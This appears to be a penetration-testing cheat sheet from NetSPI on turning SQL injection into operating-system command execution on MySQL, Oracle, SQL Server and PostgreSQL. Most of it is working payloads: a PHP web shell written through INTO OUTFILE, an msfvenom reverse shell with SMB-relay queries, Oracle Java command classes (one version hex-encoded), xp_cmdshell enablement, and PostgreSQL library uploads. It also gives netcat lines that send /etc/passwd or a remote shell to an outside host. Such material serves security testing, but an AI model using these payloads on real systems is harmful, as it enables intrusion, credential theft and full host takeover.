Executing OS Commands Through MySQL
Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
| Description | Query |
|---|---|
| Command Execution (PHP) | SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php' |
| Command Execution with MySQL CLI Access | https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ |
SMB Relay Shell
Requires
* Metasploit
* smbrelayx
Generate the reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR.IP.GOES.HERE LPORT=443 -f exe > reverse_shell.exe
Generate a listener to deliver the reverse shell
smbrelayx.py -h VICTIM.IP.GOES.HERE -e ./reverse_shell.exe
Execute any one of the MySQL queries below to call the listener
select load_file('\\\\YOUR.IP.GOES.HERE\\aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);
select 'netspi' into dumpfile '\\\\YOUR.IP.GOES.HERE\\aa';
select 'netspi' into outfile '\\\\YOUR.IP.GOES.HERE\\aa';
load data infile '\\\\YOUR.IP.GOES.HERE\\aa' into table database.table_name;
For more information see here
Executing OS Commands Through Oracle
Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
Java can be used to execute commands if it's installed.
| Description | Query |
|---|---|
| Creating Java Classes |
/* create Java class */ BEGIN EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; END; / BEGIN EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; END; / /* run OS command */ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; |
| Creating Java Classes (Hex encoded) |
/* create Java class */ SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d'')); EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual /* run OS command */ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; |
Executing OS Commands Through SQL Server
Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
| Name | Query |
|---|---|
| xp_cmdshell | -- Enable show advanced options sp_configure 'show advanced options', 1 RECONFIGURE GO -- Enable xp_cmdshell sp_configure 'xp_cmdshell', 1 RECONFIGURE GO EXEC xp_cmdshell 'net user' |
| Write to registry autorun | https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/ https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e |
| Write to file autorun | https://blog.netspi.com/how-to-hack-database-links-in-sql-server/ |
| Agent Jobs | https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution |
| SQL Injection in stored procedures | https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/ |
| CLR Assembly | https://blog.netspi.com/attacking-sql-server-clr-assemblies/ |
| Custom Extended Stored Procedure | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/cmd_exec.cpp |
TSQL
Executing OS Commands Through PostgreSQL
Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
| Name | Query |
|---|---|
|
FROM PROGRAM |
DROP TABLE IF EXISTS myoutput; CREATE TABLE myoutput(filename text); COPY myoutput FROM PROGRAM 'ps aux'; SELECT * FROM myoutput ORDER BY filename ASC; |
|
Create PostgreSQL Function Mapped to Libc System Method |
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; SELECT system('cat /etc/passwd | nc Notes: This method works with PostgreSQL 8.1 and below. After version 9, you'll have to upload your own library with the "PG_MODULE_MAGIC" set. The process for this is outlined at https://www.dionach.com/blog/postgresql-9x-remote-command-execution, below is a summary. 1. To get the version from the PostgreSQL server use the query below. SELECT version(); 2. To compile the library, a Linux machine with the same version of PostgreSQL as the target machine is required. Below is an example showing how to install PostgreSQL. apt install postgresql postgresql-server-dev-9.6 3. Download pgexec file from https://github.com/Dionach/pgexec/tree/master. 4. Compile pgexec with the command below. gcc -I$(/usr/local/pgsql/bin/pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c 5. Upload the library to the target system. First split the file into pieces. split -b 2048 pg_exec.so 6. The file can then be written to disk through PostgreSQL using the commands below. SELECT lo_creat(-1); set c0 `base64 -w 0 xaa` INSERT INTO pg_largeobject (loid, pageno, data) values (16388, 0, decode(:'c0', 'base64')); Then repeat for each piece of the file. 7. Create the function. CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT; 8. Send a reverse shell to your system. SELECT sys('nc -e /bin/sh 10.0.0.1 4444'); Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution |
|
Metasploit postgres_payload Module This can be used with direct connections. |
https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload exploit/linux/postgres/postgres_payload |
© 2019 Copyright by NetSPI. All rights reserved.